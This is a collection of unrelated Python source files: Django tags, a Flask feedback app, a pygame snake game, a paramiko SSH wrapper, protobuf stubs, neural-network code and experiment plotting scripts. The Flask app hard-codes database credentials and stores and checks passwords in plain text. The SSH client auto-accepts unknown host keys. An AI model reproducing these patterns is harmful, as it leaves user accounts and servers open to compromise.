raise template.TemplateSyntaxError("'%s' tag takes two arguments" % bits[0])
if bits[1] != 'as':
raise template.TemplateSyntaxError("first argument to '%s' tag must be 'as'" % bits[0])
return LatestFeaturedNode('coltrane.entry', 1, bits[2])
register.tag('get_featured_entries', do_featured_entries)
register.tag('get_featured_entry', do_featured_entry)
|
23,451 | 69e84c0c0fc69eed0acccfe10eb8569b5b25642b | #coding:utf-8
from output_helper import print_banner,common_print,time_print,color_print
from modules import enable_module_list
import sys
def main():
print_banner()
if len(sys.argv)<2:
color_print("please input the path of the picture as the first argument")
return
filename = sys.argv[1]
file = open(filename,'rb').read()
for Module in enable_module_list:
module = Module()
module.run(filename,file)
if __name__ == '__main__':
main()
|
23,452 | 500e8c6672b643283c505efc56416328bc0db6c0 | from flask import Flask, render_template, request, redirect, url_for
import requests
import pymongo
app = Flask(__name__)
Feedback_URL = 'https://test-api-615.herokuapp.com/api/feedback'
API_URL = Feedback_URL + '/test'
res = requests.get(API_URL)
Headers = {'Content-Type': 'application/json'}
### assume the flask expt app below is made from a template ###
@app.route('/')
def index():
return render_template('index.html')
@app.route('/submit', methods=['POST'])
def submit():
if request.method == 'POST':
userID = request.form['userid']
# need to store slider value
sliderVal = str(request.form['myRange'])
if userID == '':
return render_template('index.html',
message='Please enter User ID')
dataToPOST = {
"userID": userID,
"sliderVal": sliderVal
}
# Return err message if userID already exists
dataGOT = requests.get(API_URL).json()
IDs = []
for i in dataGOT:
IDs.append(i["userID"])
if userID in IDs:
return render_template('index.html',
message='UserID already exists')
response = requests.post(API_URL, json=dataToPOST, headers=Headers)
return render_template('thankyou.html',
message='Submission details: {}'.
format(str(response.json())))
# return render_template('index.html',
# message='You have already submitted')
# admin_mongodburi = "mongodb+srv://admin:p123456@democluster-ee3kz"\
# ".mongodb.net/demoDatabase?retryWrites=true&w=majority"
# admin_client = pymongo.MongoClient(admin_mongodburi)
# admin_db = admin_client.demoDatabase
admin_mongodburi = "mongodb://user:p123456@ds263248.mlab.com:63248/heroku_5qkz777p"
admin_client = pymongo.MongoClient(admin_mongodburi)
admin_db = admin_client["heroku_5qkz777p"]
@app.route("/signup")
def signup():
return render_template('signup.html')
@app.route("/signup/success", methods=["POST"])
def signup_success():
if request.method == 'POST':
username = request.form['usr_name']
password = request.form['pwd']
Dest_URL = Feedback_URL + '/credentials'
dataGOT = requests.get(Dest_URL).json()
all_usernames = []
for item in dataGOT:
all_usernames.append(item["username"])
# safeguarding repetition of usernames
if username in all_usernames:
return render_template('signup.html',
message='Username already exists. Please enter a new one.',
should_login=False)
else:
admin_db.command("createUser", username,
pwd=password, roles=["restricted"])
dataToPOST = {
"username": username,
"password": password
}
sent = requests.post(Dest_URL, json=dataToPOST, headers=Headers)
return render_template('signup.html',
message='User ({}) created.'.format(username),
should_login=True)
@app.route("/signup/success/redirect", methods=["POST"])
def signup_redirect():
if request.method == 'POST':
return redirect(url_for('login'))
@app.route("/login")
def login():
return render_template('login.html')
@app.route("/researcher", methods=['POST'])
def researcher():
if request.method == 'POST':
username = request.form['usr_name']
password = request.form['pwd']
# # using mongoclient doens't give you the password
# # NEED TO LOOK AT IF THE HASH OF PASSWORD MATCHES WITH THE CREDENTIALS
# # for now, we will use a collection on mongodb to store credentials
# users = admin_db.command('usersInfo', showCredentials=True)
Dest_URL = Feedback_URL + '/credentials'
dataGOT = requests.get(Dest_URL).json()
for item in dataGOT:
if item['username'] == username:
if item['password'] == password:
return render_template('researcher.html', usr=username)
else:
return render_template('login.html',
message='Incorrect Password. Please try again.')
return render_template('login.html', message='User does not exist')
@app.route("/researcher/submit", methods=['POST'])
def researcher_submit():
if request.method == 'POST':
col_name = request.form['col_name']
username = request.form['usr']
# need to safeguard collection already exists error
admin_db.create_collection(col_name)
role_name = "use-" + col_name
admin_db.command("createRole", role_name,
privileges=[{
'resource': { 'db': 'heroku_5qkz777p', 'collection': col_name },
'actions': ['find', 'insert', 'remove', 'update' ]}],
roles=[])
# admin_db.command("updateUser", username, roles=[role_name])
# print(admin_db.command("usersInfo", showPrivileges=True))
admin_db.command("grantRolesToUser", username, roles=[{'role': role_name, 'db': 'heroku_5qkz777p'}])
return render_template('researcher.html', usr=username,
message='Collection ({}) created.'.format(col_name))
if __name__ == '__main__':
app.run()
# test |
23,453 | 729f00d1cebc55eff99121a7a3c2a16dfd6f1d2e | import pygame
import sys
import time
import random
from pygame.locals import *
WINDOW_WIDTH=800
WINDOW_HEIGHT=600
GRID_SIZE = 20
GRID_WIDTH = WINDOW_WIDTH / GRID_SIZE
GRID_HEIGHT = WINDOW_HEIGHT / GRID_SIZE
WHITE=(255, 255, 255)
GREEN = (0, 50, 0)
UP = (0, -1)
DOWN = (0, 1)
LEFT = (-1, 0)
RIGHT = (1, 0)
class Python(object):
def __init__(self):
self.creat()
self.color = Green
def create(self):
self.length = 2
self.positions = [((WINDOW_WIDTH/2), (WINDOW_HEIGHT/2))]
self.direction = random.choice([UP, DOWN, LEFT, RIGHT])
def control(self, xy):
if (xy[0]*-1, xy[1]*-1) ==self.direction:
return
else:
self.direction = xy
def move(self):
cur = self.postions[0]
x, y = self.direction
new = ((cur[0] + (x*GRID_SIZE) % WINDOW_WIDTH, (cur[1]+(y * GRID_SIZE) % WINDOW_HEIGHT))
if __name__=='__main__':
pygame.init()
window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)
pygame.display.set_caption('Python Game')
surface = pygame.Surface(window.get_size())
surface = surface.convert()
surface.fill(WHITE)
clock = pygame.time.Clock()
pygame.key_set_Repeat(1, 40)
window.blit(surface, (0, 0)) |
23,454 | f325bafcbecba73c786c095e56b5d91c70d5d579 | import onix.nax as nax
import pathlib
path1 = pathlib.Path(__file__).parent.absolute() /'5MWe-reactor-simulation_output-folder'
NAX_cell = 'Sample'
burnup_list_low = [0.6, 0.23, 0.22, 0.22, 0.23]
burnup_list_high = [0.699, 0.33, 0.31, 0.31, 0.32]
burnup_mid = [(i+j)/2 for i,j in zip(burnup_list_low, burnup_list_high)]
pow_unit_cell = 6.00000E-05 #in MW)
ihm = 118.75970682995882*1E-3
day_list = []
for bu in burnup_mid:
day = bu*ihm/pow_unit_cell
day_list.append(day)
batch1 = nax.Batch(path1)
operation_history = []
for day in day_list:
batch = (batch1, day)
operation_history.append(batch)
nax.review_all_ratio_candidates(NAX_cell, operation_history, path1, 1E-3) |
23,455 | 8b950ac053a6a47f6b3f708640eb6ef70305815d | #Week 3 Zandbergen
#6.3
def first(word):
return word[0]
print(first('Hello'))
def last(word):
return word[-1]
print(last('December'))
def middle(word):
return word[1:-1]
print(middle('Tomorrow'))
#1
#Call middle with a string of two letters - returns a blank space with ' '
print(middle('hi'))
#Call middle with a string of one letter - returns a blank space with ' '
print(middle('h'))
#Call middle with no letters - returns a blank space with ' '
print(middle(' '))
#Call middle
print(middle('Hello'))
#Call First
print(first('Hello'))
#Call Last
print(last('Hello'))
#2
def is_palindrome(word):
if word == word[:: -1]:
return True
else:
return False
print(is_palindrome('redivider'))
print(is_palindrome('noon'))
print(is_palindrome('October'))
|
23,456 | 6075d5a9e4e9011aac5189ea43f5641edb3fa075 | import os
import pygame
import random
class Mirror:
SCALE = 3
SHOWING = 0
WAITING = 1
HIDING = 2
DESTROYED = 3
SHOW_ANIMATION_DURATION = 25
HIDE_ANIMATION_DURATION = 10
DESTROY_ANIMATION_FREQUENCY = 4
IMAGES = [os.path.join("minigames/mirrors/images", f) for f in os.listdir("minigames/mirrors/images") if f.startswith("mirror") and os.path.isfile(os.path.join("minigames/mirrors/images", f))]
ANGLES = [180, 270, 0, 90]
def __init__(self, game, screen_size, duration, mirrors):
self.game = game
self.show_animation_duration = max(Mirror.SHOW_ANIMATION_DURATION / (self.game.difficulty + 1), 10)
self.spawn_start_frame = self.game.frame
self.animation_start_frame = self.spawn_start_frame
self.destroy_start_frame = 0
self.status = Mirror.SHOWING
self.blink = False
self.duration = duration
self.angle = random.choice(Mirror.ANGLES)
self.position = (0, 0)
self.gfx = pygame.image.load(random.choice(Mirror.IMAGES))
self.gfx = pygame.transform.scale(self.gfx, (self.gfx.get_width() * Mirror.SCALE, self.gfx.get_height() * Mirror.SCALE))
self.gfx = pygame.transform.rotate(self.gfx, self.angle)
screen_width, screen_height = screen_size
mirrors = filter(lambda m: m.angle == self.angle, mirrors)
self._initial_position = None
# Pop from Top
if self.angle == 180:
excluded_ranges = [range(m.x1, m.x1 + 2 * m.gfx.get_width()) for m in mirrors]
self.x1 = self.random_position(self.gfx.get_width(), screen_width - self.gfx.get_width(), excluded_ranges)
self.x2 = self.x1
self.y1 = -self.gfx.get_height()
self.y2 = 0
# Pop from Right
elif self.angle == 90:
excluded_ranges = [range(m.y1, m.y1 + 2 * m.gfx.get_height()) for m in mirrors]
self.x1 = screen_width
self.x2 = screen_width - self.gfx.get_width()
self.y1 = self.random_position(self.gfx.get_height(), screen_height - self.gfx.get_height(), excluded_ranges)
self.y2 = self.y1
# Pop from Bottom
elif self.angle == 0:
excluded_ranges = [range(m.x1, m.x1 + 2 * m.gfx.get_width()) for m in mirrors]
self.x1 = self.random_position(self.gfx.get_width(), screen_width - self.gfx.get_width(), excluded_ranges)
self.x2 = self.x1
self.y1 = screen_height
self.y2 = self.y1 - self.gfx.get_height()
# Pop from Left
elif self.angle == 270:
excluded_ranges = [range(m.y1, m.y1 + 2 * m.gfx.get_height()) for m in mirrors]
self.x1 = -self.gfx.get_width()
self.x2 = 0
self.y1 = self.random_position(self.gfx.get_height(), screen_height - self.gfx.get_height(), excluded_ranges)
self.y2 = self.y1
def random_position(self, min, max, excluded_ranges):
positions = range(min, max)
for i, p in enumerate(positions):
for er in excluded_ranges:
if p in er:
del positions[i]
break
return random.choice(positions)
def is_visible(self):
return self.game.frame - self.spawn_start_frame < self.show_animation_duration + self.duration + Mirror.HIDE_ANIMATION_DURATION
def destroy(self):
self.destroy_start_frame = self.game.elapsed_ms
self.status = Mirror.DESTROYED
def display(self, screen):
if self.is_visible():
x1 = 0
x2 = 0
y1 = 0
y2 = 0
d = 1
if self.game.frame - self.spawn_start_frame < self.show_animation_duration:
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
d = self.show_animation_duration
elif self.show_animation_duration <= self.game.frame - self.spawn_start_frame < self.show_animation_duration + self.duration:
if self.status == Mirror.SHOWING:
self.animation_start_frame = self.game.frame
self.status = Mirror.WAITING
x1 = self.x2
x2 = self.x2
y1 = self.y2
y2 = self.y2
d = self.duration
else:
if self.status == Mirror.WAITING:
self.animation_start_frame = self.game.frame
self.status = Mirror.HIDING
x1 = self.x2
x2 = self.x1
y1 = self.y2
y2 = self.y1
d = Mirror.HIDE_ANIMATION_DURATION
x = int(self.smooth_step(x1, x2, self.game.frame - self.animation_start_frame, d) + 0.5)
y = int(self.smooth_step(y1, y2, self.game.frame - self.animation_start_frame, d) + 0.5)
self.position = (x, y)
if self._initial_position is None:
self._initial_position = self.position
if self.game.frame % Mirror.DESTROY_ANIMATION_FREQUENCY == 0:
self.blink = not self.blink
if self.status != Mirror.DESTROYED or not self.blink:
screen.blit(self.gfx, self.position)
def smooth_step(self, p1, p2, t, d):
if p1 == p2:
return p1
x = (float(t) / float(d))
x = (x * x * (3 - 2 * x))
return (p2 * x) + (p1* (1 - x)) |
23,457 | 404320c58e18f7454ab2697240f5bb29ac627670 | import os
from fxpt.fx_prefsaver import prefsaver, serializers
from com import REF_ROOT_VAR_NAME
ROOTS_CFG_OPT_VAR = 'fx_refsystem_roots'
ROOTS_DEFAULT_VALUE = {'': True}
# noinspection PyAttributeOutsideInit
class RootsCfgHandler(object):
def __init__(self):
self.roots = None
self.initCfg()
self.loadCfg()
def initCfg(self):
self.prefSaver = prefsaver.PrefSaver(serializers.SerializerOptVar(ROOTS_CFG_OPT_VAR))
# self.prefSaver = PrefSaver.PrefSaver(Serializers.SerializerFileJson(os.path.dirname(__file__) + '/test.cfg'))
self.prefSaver.addVariable('roots', self.getterRoots, self.setterRoots, self.getDefaultRootsValue())
def getterRoots(self):
return self.roots
def setterRoots(self, value):
self.roots = value
# noinspection PyMethodMayBeStatic
def getDefaultRootsValue(self):
return dict(ROOTS_DEFAULT_VALUE)
def loadCfg(self):
# noinspection PyBroadException
try:
self.prefSaver.loadPrefs()
except Exception:
self.roots = self.getDefaultRootsValue()
return
self.cleanupRootsDict()
def cleanupRootsDict(self):
if len(self.roots) < 1:
self.roots = self.getDefaultRootsValue()
return
if '' not in self.roots:
self.roots = self.getDefaultRootsValue()
return
activeCount = len([v for v in self.roots.values() if v])
if activeCount == 1:
return
elif activeCount < 1:
self.roots[''] = True
return
else:
for root in self.roots:
if root == '':
self.roots[root] = True
else:
self.roots[root] = False
def saveCfg(self):
self.cleanupRootsDict()
self.prefSaver.savePrefs()
self.setEnvVar()
def setEnvVar(self):
os.environ[REF_ROOT_VAR_NAME] = self.getCurrentRoot()
def getCurrentRoot(self):
self.loadCfg()
for root, isActive in self.roots.items():
if isActive:
return root
assert False, 'no active root in cfg.'
def getRoots(self):
self.loadCfg()
return self.roots
|
23,458 | 4d4089a8f74132841b8aa783a742eb805ecd47b8 | def search(N, target):
solutions={}
ct=0
for i in range(len(N)):
for j in range(len(N)):
if N[i] + N[j] == target:
ct=ct+1
solutions[ct]=[i,j]
print(solutions)
N = [4, 10, 6, 14, 18, 19, 20]
target = 20
search(N, target)
|
23,459 | d4421b761fb556ead8dd4e95c894e848d0530807 | # Italian translations
import move_simple
def ferma():
move_simple.stop()
def destra(t):
move_simple.right(t)
def sinistra(t):
move_simple.left(t)
def avanti(t):
move_simple.forward(t)
def indietro(t):
move_simple.backward(t)
|
23,460 | f6cef4b649d54717ce826236eb57859748e4fdac | # Copyright (c) 2014, Max Zwiessele, James Hensman
# Licensed under the BSD 3-clause license (see LICENSE.txt)
from paramz import Parameterized
from .priorizable import Priorizable
import logging
logger = logging.getLogger("parameters changed meta")
class Parameterized(Parameterized, Priorizable):
"""
Parameterized class
Say m is a handle to a parameterized class.
Printing parameters:
- print m: prints a nice summary over all parameters
- print m.name: prints details for param with name 'name'
- print m[regexp]: prints details for all the parameters
which match (!) regexp
- print m['']: prints details for all parameters
Fields:
Name: The name of the param, can be renamed!
Value: Shape or value, if one-valued
Constrain: constraint of the param, curly "{c}" brackets indicate
some parameters are constrained by c. See detailed print
to get exact constraints.
Tied_to: which paramter it is tied to.
Getting and setting parameters:
Set all values in param to one:
m.name.to.param = 1
Handling of constraining, fixing and tieing parameters:
You can constrain parameters by calling the constrain on the param itself, e.g:
- m.name[:,1].constrain_positive()
- m.name[0].tie_to(m.name[1])
Fixing parameters will fix them to the value they are right now. If you change
the parameters value, the param will be fixed to the new value!
If you want to operate on all parameters use m[''] to wildcard select all paramters
and concatenate them. Printing m[''] will result in printing of all parameters in detail.
"""
pass
|
23,461 | a4ad2358c75ea199593746a69aebdf89510a47e1 | from collections import Counter
input()
shoesCounter = Counter(list(map(lambda x: int(x), input().split(' '))))
total = 0
for purchase in range(int(input())):
size, price = map(lambda x: int(x), input().split(' '))
if size in shoesCounter.keys() and shoesCounter[size] > 0:
total += price
shoesCounter[size] -= 1
else:
pass
print(total)
|
23,462 | 2cdf8d79b3bba4212f8280690262738d11118329 | # coding=gbk
"""
作者:川川
时间:2021/8/24
群:970353786
"""
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(thisdict)
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(thisdict["brand"])
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964,
"year": 2020
}
print(thisdict)
print(len(thisdict))
thisdict = {
"brand": "Ford",
"electric": False,
"year": 1964,
"colors": ["red", "white", "blue"]
}
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(type(thisdict)) |
23,463 | 259bb3ef5230922a6cc574d4c811fcb7865674ed | import time
class Stopwatch:
def __init__(self, message='', print_out=True):
self._message = message
self._print_out = print_out
def __enter__(self):
self.start = time.time()
def __exit__(self, exc_type, ecx_value, traceback):
if self._print_out:
print('{}{:.3f} sec'.format(self._message,
time.time() - self.start))
|
23,464 | 88506ecc437924887452041332ecbf4eb78a9148 | import threading
import paramiko
import time
class SSH:
shell = None
client = None
transport = None
parnent = None
current_command = None
def __init__(self, address, username, password, port, parent):
print("Connecting to server on ip", str(address) + ".")
self.parent = parent
self.client = paramiko.client.SSHClient()
self.client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
self.client.connect(address, username=username, password=password, look_for_keys=False)
self.transport = paramiko.Transport((address, port))
self.transport.connect(username=username, password=password)
thread = threading.Thread(target=self.process)
thread.daemon = True
thread.start()
def closeConnection(self):
if(self.client != None):
self.client.close()
self.transport.close()
def openShell(self):
self.shell = self.client.invoke_shell()
def sendShell(self, command):
if(self.shell):
self.current_command = command[command.find('ls'):]
print(self.current_command)
self.shell.send(command + "\n")
else:
print("Shell not opened.")
def process(self):
global connection
output = []
should_return = False
temp_str = ''
while True:
while should_return == False:
if self.shell != None and self.shell.recv_ready():
alldata = self.shell.recv(1024)
while self.shell.recv_ready():
alldata += self.shell.recv(1024)
time.sleep(0.5)
strdata = str(alldata)
strdata = strdata.replace("b'", '')
strdata = strdata.replace("'", '')
strdata = strdata.replace('\\r', '')
strdata = strdata.replace('\\n', '\n')
strdata = strdata.replace('\r', '')
temp_str = temp_str + strdata
data = strdata.split(' ')
for dat in data:
if dat != '':
if dat.endswith("$"):
should_return = True
else:
pass
if should_return:
temp = temp_str.split('\n')
print(temp)
del(temp[0])
del(temp[len(temp) - 1])
if temp[0].startswith('ls: cannot access */'):
output = []
else:
tot_string = ''
for item in temp:
tot_string = tot_string + ' ' + item
print(tot_string)
data = tot_string.split(' ')
output = []
for dat in data:
if dat != '':
dat = dat.replace('/', '')
output.append(dat)
self.parent.Process_Output(self.current_command, output)
should_return = False
temp_str = ''
|
23,465 | 6fd489a5e1149647a6d10244acdc426e2edf3741 | from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core.signing import BadSignature, SignatureExpired, loads, dumps
from django.http import Http404, HttpResponseBadRequest
from django.shortcuts import redirect
from django.template.loader import get_template
from django.views.generic import CreateView, TemplateView
from users.forms import UsersRegistForm
from main.models import User
class UsersRegistView(CreateView):
"""ユーザー仮登録"""
template_name = 'users/regist.html'
form_class = UsersRegistForm
def form_valid(self, form):
"""仮登録と本登録用メールの発行."""
user = form.save(commit=False)
user.is_active = False
user.save()
# アクティベーションURLの送付
current_site = get_current_site(self.request)
domain = current_site.domain
context = {
'protocol': self.request.scheme,
'domain': domain,
'token': dumps(user.pk),
'user': user,
}
subject_template = get_template('users/mail_template/regist/subject.txt')
subject = subject_template.render(context)
message_template = get_template('users/mail_template/regist/message.txt')
message = message_template.render(context)
user.email_user(subject, message)
return redirect('users:regist_done')
class UsersRegistDone(TemplateView):
"""ユーザー仮登録したよ"""
template_name = 'users/regist_done.html'
class UsersRegistComplete(TemplateView):
"""メール内URLアクセス後のユーザー本登録"""
template_name = 'users/regist_complete.html'
timeout_seconds = getattr(settings, 'ACTIVATION_TIMEOUT_SECONDS', 60*60*24) # デフォルトでは1日以内
def get(self, request, **kwargs):
"""tokenが正しければ本登録."""
token = kwargs.get('token')
try:
user_pk = loads(token, max_age=self.timeout_seconds)
# 期限切れ
except SignatureExpired:
return HttpResponseBadRequest()
# tokenが間違っている
except BadSignature:
return HttpResponseBadRequest()
# tokenは問題なし
else:
try:
user = User.objects.get(pk=user_pk)
except User.DoesNotExist:
return HttpResponseBadRequest()
else:
if not user.is_active:
# 問題なければ本登録とする
user.is_active = True
user.save()
return super().get(request, **kwargs)
return HttpResponseBadRequest() |
23,466 | 65ec02cefef5790ae694f0399572c0b52a355726 | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
"""
test Conv2D_Transpose
"""
import pytest
import paddle
import numpy as np
from jitbase import Runner
from jitbase import randtool
class Conv2DTransposeNet(paddle.nn.Layer):
"""
a Conv2DTranpose Layer
"""
def __init__(self, dtype=np.float32):
paddle.set_default_dtype(dtype)
super(Conv2DTransposeNet, self).__init__()
self._conv2d_t = paddle.nn.Conv2DTranspose(in_channels=4, out_channels=8, kernel_size=3, padding=1)
@paddle.jit.to_static
def forward(self, inputs):
"""
forward
"""
return self._conv2d_t(inputs)
@pytest.mark.jit_Conv2D_Transpose_vartype
def test_jit_Conv2D_Transpose_base():
"""
@paddle.jit.to_static
def fun(inputs):
return paddle.Conv2D_Transpose(inputs)
inputs=np.array([1.5, 2.1, 3.2])
dtype=["float32", "float64", "int32", "int64", "uint8"]
"""
inps = randtool("float", -2, 2, shape=[2, 4, 224, 224])
runner = Runner(func=Conv2DTransposeNet, name="Conv2D_Transpose_base", dtype=["float32", "float64"], ftype="layer")
runner.add_kwargs_to_dict("params_group1", inputs=inps)
runner.run()
|
23,467 | f7651f80953be8f31958eb83cc8d4a7689765364 | dmap = {}
def divisors(n):
if n == 1:
return set([1])
if n in dmap:
return dmap[n]
divs = set([])
for x in xrange(1, n/2+1):
if x in divs:
continue
if n % x == 0:
divs.add(x)
divs.update(divisors(x))
dmap[n] = divs
return divs
def is_abundant(n):
return sum(divisors(n)) > n
abuns = []
for x in range(1, 28123):
if is_abundant(x):
abuns.append(x)
ns = set(range(1, 28123+1))
for x in abuns:
for y in abuns:
s = x + y
if s in ns:
ns.remove(s)
print sum(ns)
|
23,468 | 0668c00387aef23df52effb866e9617172fb5bae | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: base.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='base.proto',
package='ex.protos',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\nbase.proto\x12\tex.protos\"\x15\n\x04\x42\x61se\x12\r\n\x05\x66ield\x18\x01 \x01(\x08\x62\x06proto3'
)
_BASE = _descriptor.Descriptor(
name='Base',
full_name='ex.protos.Base',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='field', full_name='ex.protos.Base.field', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=25,
serialized_end=46,
)
DESCRIPTOR.message_types_by_name['Base'] = _BASE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Base = _reflection.GeneratedProtocolMessageType('Base', (_message.Message,), {
'DESCRIPTOR' : _BASE,
'__module__' : 'base_pb2'
# @@protoc_insertion_point(class_scope:ex.protos.Base)
})
_sym_db.RegisterMessage(Base)
# @@protoc_insertion_point(module_scope)
|
23,469 | 40b1d5622767188ef98042cf815ed71ccba90db5 | import copy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
class Identity(nn.Module):
def __init__(self, *args, **kwargs):
super().__init__()
def forward(self, x):
return x
string_to_activation = {
'identity': Identity(),
'leaky_relu': nn.LeakyReLU(),
'relu': nn.ReLU(),
'sigmoid': nn.Sigmoid(),
'tanh': nn.Tanh(),
'elu': nn.ELU()
}
class NeuralNetwork_Deep(nn.Module):
def __init__(self, device):
super(NeuralNetwork_Deep, self).__init__()
self.device = device
self.modules = []
self.model = None
def forward(self, x):
return self.model(x)
def apply_weights(self, node):
if node['weights'] is None:
node['weights'] = self.modules[-1].weight.data
else:
rows = self.modules[-1].weight.data.size(0)
cols = self.modules[-1].weight.data.size(1)
# Add row if necessary
difference = self.modules[-1].weight.data.size(0) - node['weights'].size(0)
if difference > 0:
node['weights'] = torch.cat((node['weights'], torch.zeros(difference, node['weights'].size(1), device=self.device)), 0)
# Add column if necessary
difference = self.modules[-1].weight.data.size(1) - node['weights'].size(1)
if difference > 0:
node['weights'] = torch.cat((node['weights'], torch.zeros(node['weights'].size(0), difference, device=self.device)), 1)
self.modules[-1].weight.data = node['weights'][:rows, :cols]
def apply_bias(self, node):
if node['biases'] is None:
node['biases'] = self.modules[-1].bias.data
else:
cols = self.modules[-1].bias.data.size(0)
difference = self.modules[-1].bias.data.size(0) - node['biases'].size(0)
if difference > 0:
node['biases'] = torch.cat((node['biases'], torch.zeros(difference, device=self.device)), 0)
self.modules[-1].bias.data = node['biases'][:cols]
def create_genome_from_network(self):
for layer in range(0, len(self.model) - 2, 2):
self.nodes[int(layer/2) + 2]['weights'] = self.model[layer].weight.data
self.nodes[int(layer/2) + 2]['biases'] = self.model[layer].bias.data
self.nodes[1]['weights'] = self.model[-2].weight.data
self.nodes[1]['biases'] = self.model[-2].bias.data
return self.nodes
def create_network(self, genome):
# Extract sequence and nodes
self.nodes = genome.nodes
# Keep track of the size of the previous layer
previous_input_size = self.nodes[0]['num_nodes']
# 0 and 1 are reserved for the input and output layer and are fixed
for i in range(2, len(self.nodes)):
self.modules.append(nn.Linear(previous_input_size, self.nodes[i]['num_nodes']))
self.apply_weights(self.nodes[i])
self.apply_bias(self.nodes[i])
self.modules.append(string_to_activation[self.nodes[i]['activation_function']])
previous_input_size = self.nodes[i]['num_nodes']
self.modules.append(nn.Linear(previous_input_size, self.nodes[1]['num_nodes']))
self.apply_weights(self.nodes[1])
self.apply_bias(self.nodes[1])
self.modules.append(string_to_activation[self.nodes[1]['activation_function']])
self.model = nn.Sequential(*self.modules)
def act(self, state, epsilon, mask, device):
if np.random.rand() > epsilon:
state = torch.tensor([state], dtype=torch.float32, device=device)
mask = torch.tensor([mask], dtype=torch.float32, device=device)
q_values = self.forward(state) + mask
action = q_values.max(1)[1].view(1, 1).item()
else:
action = np.random.randint(self.num_actions)
return action
|
23,470 | 263202d776b434d29c6370c521af6afc7afe5db4 | class Solution:
def maxProfit(self, prices) -> int:
days = len(prices)
if not prices:
return 0
profit = 0
for i in range(1, days):
diff = prices[i] - prices[i-1]
if diff > 0:
profit+= diff
return profit
if __name__ == '__main__':
print(Solution().maxProfit([1,2,3,4,5]))
print(Solution().maxProfit([1,9,6,9,1,7,1,1,5,9,9,9]))
|
23,471 | 0330c14241bfccd1864366288b767165e78b3bb9 | """ This script loads the deep guidance data logged from an experiment (specifically, logged by use_deep_guidance_arm.py)
renders a few plots, and animates the motion.
It should be run from the folder where use_deep_guidance_arm.py was run from for the given experiment.
"""
import numpy as np
import glob
import os
import matplotlib.pyplot as plt
from pyvirtualdisplay import Display # for rendering
# import code # for debugging
#code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution
try:
from settings import Settings
except:
print("\nYou must use the manipulator environment in settings.py\n\nQuitting")
raise SystemExit
assert Settings.ENVIRONMENT == 'manipulator'
environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment
def make_C_bI(angle):
C_bI = np.array([[ np.cos(angle), np.sin(angle)],
[-np.sin(angle), np.cos(angle)]]) # [2, 2]
return C_bI
# Generate a virtual display for plotting
display = Display(visible = False, size = (1400,900))
display.start()
#####################################
### Load in the experimental data ###
#####################################
log_filename = glob.glob('*46-55.txt')[0]
data = np.load(log_filename)
print("Data file %s is loaded" %log_filename)
os.makedirs(log_filename.split('.')[0], exist_ok=True)
########################
### Plot some things ###
########################
time_log = data[:,0]
deep_guidances_ax = data[:,1]
deep_guidances_ay = data[:,2]
deep_guidances_alpha = data[:,3]
deep_guidances_shoulder = data[:,4]
deep_guidances_elbow = data[:,5]
deep_guidances_wrist = data[:,6]
plt.figure()
plt.plot(time_log, deep_guidances_ax)
plt.plot(time_log, deep_guidances_ay)
plt.savefig(log_filename.split('.')[0] + "/Acceleration Commands.png")
print("Saved acceleration commands figure")
plt.figure()
plt.plot(time_log, deep_guidances_alpha)
plt.savefig(log_filename.split('.')[0] + "/Angular Acceleration commands.png")
print("Saved angular acceleration commands figure")
plt.figure()
plt.plot(time_log, deep_guidances_shoulder)
plt.plot(time_log, deep_guidances_elbow)
plt.plot(time_log, deep_guidances_wrist)
plt.savefig(log_filename.split('.')[0] + "/Arm Acceleration commands.png")
print("Saved arm angular acceleration commands figure")
##########################
### Animate the motion ###
##########################
# Generate an Environment to use for reward logging
environment = environment_file.Environment()
environment.reset(False)
# Process the data. Need to make the raw total state log
# [relative_x, relative_y, relative_vx, relative_vy,
#relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta,
#target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega,
#target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everythign else in Inertial frame #*
print("Rendering animation...", end='')
raw_total_state_log = []
cumulative_reward_log = []
action_log = []
cumulative_rewards = 0
SPOTNet_previous_relative_x = 0.0
are_we_done = False
timestep_where_docking_occurred = -1
for i in range(len(data)):
Pi_time, deep_guidance_Ax, deep_guidance_Ay, deep_guidance_alpha_base, \
deep_guidance_alpha_shoulder, deep_guidance_alpha_elbow, deep_guidance_alpha_wrist, \
Pi_red_x, Pi_red_y, Pi_red_theta, \
Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
Pi_black_x, Pi_black_y, Pi_black_theta, \
Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
shoulder_theta, elbow_theta, wrist_theta, \
shoulder_omega, elbow_omega, wrist_omega, docked = data[i,:]
# Raw total state log
